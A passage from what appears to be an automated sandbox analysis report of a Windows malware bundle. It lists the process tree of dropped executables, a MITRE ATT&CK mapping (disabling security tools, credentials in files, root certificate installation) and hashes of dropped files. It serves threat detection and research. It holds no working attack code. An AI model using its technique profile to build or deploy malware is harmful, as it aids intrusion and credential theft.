                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2792
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                        2⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Checks processor information in registry
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Modifies registry class
                                                                                        PID:2840
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                      1⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4696
                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      PID:4764
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4948
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Modifies registry class
                                                                                      PID:5304
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5864
                                                                                    • C:\Windows\system32\werfault.exe
                                                                                      werfault.exe /h /shared Global\a5b9bdd34e4a4dbd952457f54861885e /t 4224 /p 5864
                                                                                      1⤵
                                                                                        PID:4928
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:5096
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          PID:5760
                                                                                        • C:\Users\Admin\AppData\Local\Temp\6211.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\6211.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:5312
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:4772
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                              PID:5624
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:4932
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5316
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:2904
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5960
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:4556
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:6100
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5824
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                      1⤵
                                                                                                        PID:5352
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                        1⤵
                                                                                                          PID:5964
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\976F.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\976F.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5568
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 828
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5848
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 856
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5844
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 884
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5388
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 1020
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5860
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 1028
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4400
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 1128
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:2776
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 1052
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5336
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 1192
                                                                                                            2⤵
                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                            • Program crash
                                                                                                            PID:3336
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E1D7.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\E1D7.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1644
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:1244
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:5664
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5636
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:4256
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4984
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:6140
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:5700
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:2984
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:3260
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:4836

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                            Persistence

                                                                                                            Registry Run Keys / Startup Folder

                                                                                                            1
                                                                                                            T1060

                                                                                                            BITS Jobs

                                                                                                            1
                                                                                                            T1197

                                                                                                            Defense Evasion

                                                                                                            Disabling Security Tools

                                                                                                            2
                                                                                                            T1089

                                                                                                            Modify Registry

                                                                                                            5
                                                                                                            T1112

                                                                                                            BITS Jobs

                                                                                                            1
                                                                                                            T1197

                                                                                                            Install Root Certificate

                                                                                                            1
                                                                                                            T1130

                                                                                                            Credential Access

                                                                                                            Credentials in Files

                                                                                                            4
                                                                                                            T1081

                                                                                                            Discovery

                                                                                                            Software Discovery

                                                                                                            1
                                                                                                            T1518

                                                                                                            Query Registry

                                                                                                            4
                                                                                                            T1012

                                                                                                            System Information Discovery

                                                                                                            4
                                                                                                            T1082

                                                                                                            Security Software Discovery

                                                                                                            1
                                                                                                            T1063

                                                                                                            Peripheral Device Discovery

                                                                                                            1
                                                                                                            T1120

                                                                                                            Remote System Discovery

                                                                                                            1
                                                                                                            T1018

                                                                                                            Collection

                                                                                                            Data from Local System

                                                                                                            4
                                                                                                            T1005

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                              MD5

                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                              SHA1

                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                              SHA256

                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                              SHA512

                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                              MD5

                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                              SHA1

                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                              SHA256

                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                              SHA512

                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                            • C:\Program Files\Windows Media Player\TERTWYAOXY\ultramediaburner.exe
                                                                                                              MD5

                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                              SHA1

                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                              SHA256

                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                              SHA512

                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                            • C:\Program Files\Windows Media Player\TERTWYAOXY\ultramediaburner.exe
                                                                                                              MD5

                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                              SHA1

                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                              SHA256

                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                              SHA512

                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                            • C:\Program Files\install.dat
                                                                                                              MD5

                                                                                                              806c3221a013fec9530762750556c332

                                                                                                              SHA1

                                                                                                              36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                              SHA256

                                                                                                              9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                              SHA512

                                                                                                              56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                            • C:\Program Files\install.dat
                                                                                                              MD5

                                                                                                              31e4a5735b20be6a53cbb552663b1cc3

                                                                                                              SHA1

                                                                                                              c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                              SHA256

                                                                                                              b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                              SHA512

                                                                                                              3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                            • C:\Program Files\install.dll
                                                                                                              MD5

                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                              SHA1

                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                              SHA256

                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                              SHA512

                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                            • C:\Program Files\install.dll
                                                                                                              MD5

                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                              SHA1

                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                              SHA256

                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                              SHA512

                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                            • C:\Program Files\libEGL.dll
                                                                                                              MD5

                                                                                                              cc0f81a657d6887e246f49151e60123d

                                                                                                              SHA1

                                                                                                              1eb31528501c375817853e09d95b7152858c5b31

                                                                                                              SHA256

                                                                                                              31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                              SHA512

                                                                                                              8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\33n0x2su.olx\instEU.exe
                                                                                                              MD5

                                                                                                              bdb62dc3502ea91f26181fa451bd0878

                                                                                                              SHA1

                                                                                                              bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                              SHA256

                                                                                                              6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                              SHA512

                                                                                                              12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\33n0x2su.olx\instEU.exe
                                                                                                              MD5

                                                                                                              bdb62dc3502ea91f26181fa451bd0878

                                                                                                              SHA1

                                                                                                              bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                              SHA256

                                                                                                              6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                              SHA512

                                                                                                              12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\351qhkbn.b5b\inst.exe
                                                                                                              MD5

                                                                                                              edd1b348e495cb2287e7a86c8070898d

                                                                                                              SHA1

                                                                                                              682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                              SHA256

                                                                                                              eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                              SHA512

                                                                                                              613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\351qhkbn.b5b\inst.exe
                                                                                                              MD5

                                                                                                              edd1b348e495cb2287e7a86c8070898d

                                                                                                              SHA1

                                                                                                              682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                              SHA256

                                                                                                              eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                              SHA512

                                                                                                              613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3komfgyy.o5s\SunLabsPlayer.exe
                                                                                                              MD5

                                                                                                              b769e8ef78729bdb3503a3c4e14fe473

                                                                                                              SHA1

                                                                                                              5f11436ce38a5ffcc7d53301c04487ce3e0871b2

                                                                                                              SHA256

                                                                                                              1d7435dcde8a286ab4184795d44c1c8946e0f18d4ad5b953df4b19a56ddfe08c

                                                                                                              SHA512

                                                                                                              5f1a38b557a191c6b915c9f78eb461d881bbec8fa15cf97a8022c68667a7dd1859c74edf661983baaa7de1b76f7d3b022609de6c8ce20bb43ba59bc72d281773

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3komfgyy.o5s\SunLabsPlayer.exe
                                                                                                              MD5

                                                                                                              b769e8ef78729bdb3503a3c4e14fe473

                                                                                                              SHA1

                                                                                                              5f11436ce38a5ffcc7d53301c04487ce3e0871b2

                                                                                                              SHA256

                                                                                                              1d7435dcde8a286ab4184795d44c1c8946e0f18d4ad5b953df4b19a56ddfe08c

                                                                                                              SHA512

                                                                                                              5f1a38b557a191c6b915c9f78eb461d881bbec8fa15cf97a8022c68667a7dd1859c74edf661983baaa7de1b76f7d3b022609de6c8ce20bb43ba59bc72d281773

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6c-2968f-c40-36389-60ff61f9a74f9\Kenessey.txt
                                                                                                              MD5

                                                                                                              97384261b8bbf966df16e5ad509922db

                                                                                                              SHA1

                                                                                                              2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                              SHA256

                                                                                                              9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                              SHA512

                                                                                                              b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6c-2968f-c40-36389-60ff61f9a74f9\Lozhotalyhe.exe
                                                                                                              MD5

                                                                                                              2e91d25073151415f8c39de2262cbba8

                                                                                                              SHA1

                                                                                                              32544481a34273a1a870822152d201ea9c19b34d

                                                                                                              SHA256

                                                                                                              0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                              SHA512

                                                                                                              306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6c-2968f-c40-36389-60ff61f9a74f9\Lozhotalyhe.exe
                                                                                                              MD5

                                                                                                              2e91d25073151415f8c39de2262cbba8

                                                                                                              SHA1

                                                                                                              32544481a34273a1a870822152d201ea9c19b34d

                                                                                                              SHA256

                                                                                                              0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                              SHA512

                                                                                                              306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6c-2968f-c40-36389-60ff61f9a74f9\Lozhotalyhe.exe.config
                                                                                                              MD5

                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                              SHA1

                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                              SHA256

                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                              SHA512

                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\80-8421e-0c2-0e490-60f7ab1c86640\Gejifylavae.exe
                                                                                                              MD5

                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                              SHA1

                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                              SHA256

                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                              SHA512

                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\80-8421e-0c2-0e490-60f7ab1c86640\Gejifylavae.exe
                                                                                                              MD5

                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                              SHA1

                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                              SHA256

                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                              SHA512

                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\80-8421e-0c2-0e490-60f7ab1c86640\Gejifylavae.exe.config
                                                                                                              MD5

                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                              SHA1

                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                              SHA256

                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                              SHA512

                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                              MD5

                                                                                                              41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                              SHA1

                                                                                                              0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                              SHA256

                                                                                                              97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                              SHA512

                                                                                                              5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                              MD5

                                                                                                              41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                              SHA1

                                                                                                              0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                              SHA256

                                                                                                              97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                              SHA512

                                                                                                              5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                              MD5

                                                                                                              3b1b318df4d314a35dce9e8fd89e5121

                                                                                                              SHA1

                                                                                                              55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                              SHA256

                                                                                                              4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                              SHA512

                                                                                                              f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                              MD5

                                                                                                              3b1b318df4d314a35dce9e8fd89e5121

                                                                                                              SHA1

                                                                                                              55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                              SHA256

                                                                                                              4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                              SHA512

                                                                                                              f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                              MD5

                                                                                                              3bc84c0e8831842f2ae263789217245d

                                                                                                              SHA1

                                                                                                              d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                              SHA256

                                                                                                              757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                              SHA512

                                                                                                              f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                              MD5

                                                                                                              3bc84c0e8831842f2ae263789217245d

                                                                                                              SHA1

                                                                                                              d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                              SHA256

                                                                                                              757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                              SHA512

                                                                                                              f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                              MD5

                                                                                                              e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                              SHA1

